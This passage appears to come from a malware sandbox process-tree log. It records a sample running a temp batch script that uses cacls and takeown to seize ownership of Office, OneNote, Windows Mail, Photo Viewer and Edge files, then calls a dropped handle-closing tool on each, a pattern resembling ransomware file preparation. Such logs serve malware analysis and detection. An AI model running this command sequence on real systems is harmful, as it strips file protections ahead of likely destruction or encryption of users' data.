- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000N.bin" -nobanner
    3⤵
    PID:6888
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000000N.bin" -nobanner
      4⤵
      PID:9176
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""
  2⤵
  PID:3892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C
    3⤵
    PID:8308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000011.bin" -nobanner
    3⤵
    PID:6856
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000011.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:7956
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""
  2⤵
  PID:3128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C
    3⤵
    PID:6784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000006D.bin" -nobanner
    3⤵
    PID:7244
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000006D.bin" -nobanner
      4⤵
      PID:6524
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin""
  2⤵
  PID:5452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin" /E /G Admin:F /C
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin"
    3⤵
    PID:4880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000006N.bin" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8852
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000006N.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:2248
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin""
  2⤵
  PID:7488
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin" /E /G Admin:F /C
    3⤵
    PID:7172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin"
    3⤵
    - Modifies file permissions
    PID:7296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000007V.bin" -nobanner
    3⤵
    PID:6028
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000007V.bin" -nobanner
      4⤵
      PID:7136
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin""
  2⤵
  PID:568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin" /E /G Admin:F /C
    3⤵
    PID:9180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin"
    3⤵
    - Modifies file permissions
    PID:3700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000089.bin" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000089.bin" -nobanner
      4⤵
      PID:6440
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin""
  2⤵
  PID:6408
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin" /E /G Admin:F /C
    3⤵
    PID:6732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin"
    3⤵
    PID:8288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000009B.bin" -nobanner
    3⤵
    PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000009B.bin" -nobanner
      4⤵
      PID:6820
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin""
  2⤵
  PID:4900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin" /E /G Admin:F /C
    3⤵
    PID:8356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin"
    3⤵
    PID:6516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000009L.bin" -nobanner
    3⤵
    PID:6536
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "0000009L.bin" -nobanner
      4⤵
      PID:6520
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin""
  2⤵
  PID:9084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin" /E /G Admin:F /C
    3⤵
    PID:6580
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin"
    3⤵
    PID:7112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000A6.bin" -nobanner
    3⤵
    PID:5960
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000A6.bin" -nobanner
      4⤵
      PID:8608
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin""
  2⤵
  PID:7272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin"
    3⤵
    - Modifies file permissions
    PID:6624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000AH.bin" -nobanner
    3⤵
    PID:6660
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000AH.bin" -nobanner
      4⤵
      PID:6744
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7888
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin""
  2⤵
  PID:1532
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin" /E /G Admin:F /C
    3⤵
    PID:7084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin"
    3⤵
    PID:4948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "000000B7.bin" -nobanner
    3⤵
    PID:6980
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "000000B7.bin" -nobanner
      4⤵
      PID:8588
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:6960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:7484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    PID:2348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:3996
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:892
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:5724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    PID:8380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:6068
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:7964
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:7540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:5004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:8036
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:3516
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:7436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    PID:9080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6368
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:7552
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui""
  2⤵
  PID:3492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:6492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui"
    3⤵
    PID:8168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:8952
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:7564
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6816
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\qu.pak""
  2⤵
  PID:6768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\qu.pak" /E /G Admin:F /C
    3⤵
    PID:5284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\Locales\qu.pak"
    3⤵
    PID:7152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "qu.pak" -nobanner
    3⤵
    PID:7800
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "qu.pak" -nobanner
      4⤵
      PID:1676
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:8096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:6120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    PID:6412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:7144
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:9100
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:9208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    PID:4496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3388
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:2236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1820
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1476
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\identity_proxy\win11\identity_helper.Sparse.Beta.msix""
  2⤵
  PID:6708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\identity_proxy\win11\identity_helper.Sparse.Beta.msix" /E /G Admin:F /C
    3⤵
    PID:6344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\identity_proxy\win11\identity_helper.Sparse.Beta.msix"
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "identity_helper.Sparse.Beta.msix" -nobanner
    3⤵
    PID:6156
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "identity_helper.Sparse.Beta.msix" -nobanner
      4⤵
      PID:6288
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8256
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:7452
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:7256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:6352
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:5240
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:3924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:6224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    PID:6200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:6280
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:428
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\ServiceWorkerFiles\487CE187-44E6-47CC-B689-B558256E9E8C\Zrtu2hQ08VU_1.bytecode""
  2⤵
  PID:6296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\ServiceWorkerFiles\487CE187-44E6-47CC-B689-B558256E9E8C\Zrtu2hQ08VU_1.bytecode" /E /G Admin:F /C
    3⤵
    PID:2436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\ServiceWorkerFiles\487CE187-44E6-47CC-B689-B558256E9E8C\Zrtu2hQ08VU_1.bytecode"
    3⤵
    - Modifies file permissions
    PID:6704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "Zrtu2hQ08VU_1.bytecode" -nobanner
    3⤵
    PID:9064
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "Zrtu2hQ08VU_1.bytecode" -nobanner
      4⤵
      PID:2996
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""
  2⤵
  PID:6804
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C
    3⤵
    PID:9144
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"
    3⤵
    - Modifies file permissions
    PID:9132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "00000008.bin" -nobanner
    3⤵
    PID:6140
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "00000008.bin" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:8812
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""
  2⤵
  PID:5672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "0000000M.bin" -nobanner
    3⤵
    PID:8960
